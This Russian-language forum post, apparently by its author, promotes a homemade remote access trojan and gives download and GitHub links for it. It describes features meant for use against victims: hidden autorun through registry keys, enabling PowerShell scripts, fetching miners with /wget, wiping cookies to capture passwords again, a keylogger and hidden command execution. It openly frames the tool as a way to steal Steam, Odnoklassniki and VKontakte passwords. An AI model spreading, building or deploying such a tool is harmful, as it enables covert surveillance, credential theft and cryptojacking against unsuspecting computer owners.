Этот гайд завершает мою эпопею с написанием собственного RMS (RAT). Легкий и маленький дистрибутив имеет ряд приятных функций, которые помогут вам угнать пароли от стима, одноклассников и вконтакта, а так же скачивать ПО и запускать скрипты PowerShell. Чем так хорош PowerShell? Набери в гугле это словосочетание "powershell hack" и офигей от моря различных скриптов которые позволят расширить функционал моей тулзы до небес)))
Итак, от предисловия к делу. Основные команды управления будут показаны в видео, а так же будет показан процесс работы программы. Вы так же её можете скачать по адресу rar архив и отредактировать конфиг бота под себя - https://yadi.sk/d/4PC45dbj3NLYav
Или скомпилировать код с помощь CX_FREEZE самостоятельно для любой винды, начиная с висты.
Скоро код по-человечески выложу на гитхаб (уже) [https://github.com/enot-pogromist/simple_rat_bot] , там же постепенно будут появляться сниппеты PowerShell'а.
Видео - Гайд:
CodeВНИМАНИЕ! ТЕПЕРЬ РАЗАРХИВИРУЕМ и ЗАПУСКАЕМ ИЗ ПАПКИ С:\USERS\; этот костыль уберу, можно будет скидывать в любую папку и запускать из неё же.
Основной Гайд:
Итак, при запуске sfx архива мы получаем программу, запущенную от имени администратора, для того что бы изменить два параметра реестра - на автозапуск и получение разрешения на запуск powershell скриптов, которые мы будем качать потом из интернета.
В коде функция старт выглядит именно так. Она и добавляет эти два ключа. Вызывается эта функция командой:
Далее идет стандартное приветствие, когда наш бот запустится на машине пользователя. Так мы поймем, что ключи прописаны
и все работает штатно. Следующей командой мы можем, например, докачать какой нибудь майнер:
Нам нужно будет набрать /wget и адрес файла в интернете. Так же можно скачивать любые другие программы и скрипты.
А следующей функцией у нас будет удаление куки всех браузеров и стима:
Она позволит стереть регистрационные данные пользователя, заставив его ввести повторно все пароли, от всех акков.
Но пока я остановился на пяти вариантах кукис, для Хрома, ЯндексБро, Стима, Лисицы и Оперы:
Шлите мне местоположения куки других игр/приложений/всей ерунды для того что бы программа стала удобнее. Не хочется
лазить и тереть ручками всё самому.
А вот две следующих команды позволят нам начать слежку за клавиатурой и загрузку ***** когда мы захотим.
Эта команда запусит Кейлоггер.
А эта позволит нам скачать ****.... А теперь я расскажу еще об трех командах которые вам пригодятся, например, запуск
программ с любыми параметрами, причем скрытый:
Это команда /cmd, а за ней будут следовать любые параметры, какие вам заблагорассудится, отчет о том как работает
присылается тут же и вы можете просмотреть все ****.
А так же есть стандартные программы перемещения по дирректориям - ls и cd соответственно, их функционал соответствует
BusyBox, ничего особенного вообщем:
В результате работы над этим скриптом пострадала 1 (компьютерная) мышка, 1 банка кофе, 1 блок сигарет, 1 мозг, моё
самоуважение.
PS. Вебка работает только тогда - когда программа - скрипт, как компилируется - падает и не поднимается. За сим эту хрень
выбрасываю в угоду скорости и надежности.
ЗЫ: Подпишись на Ютьюб, тебе жалко шо ле?
#МояСтатья
![[IMG]](https://pp.userapi.com/c841629/v841629504/244f2/Hc6BxaiH1Fs.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244ca/HndYHYhV158.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244fa/nMa4oDLcZYc.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/2450a/9kv8gXu9zAo.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244ba/QrHSJYoOe14.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244c2/UJx7sHj7PL4.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244d2/eV9LInybhds.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244da/MnMgcTxt9q4.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244aa/Hek5lXxHnJk.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244b2/ZsldN5IWO6k.jpg "[IMG]")
![[IMG]](https://pp.userapi.com/c841629/v841629504/244e2/1WpdkhVV1tE.jpg "[IMG]")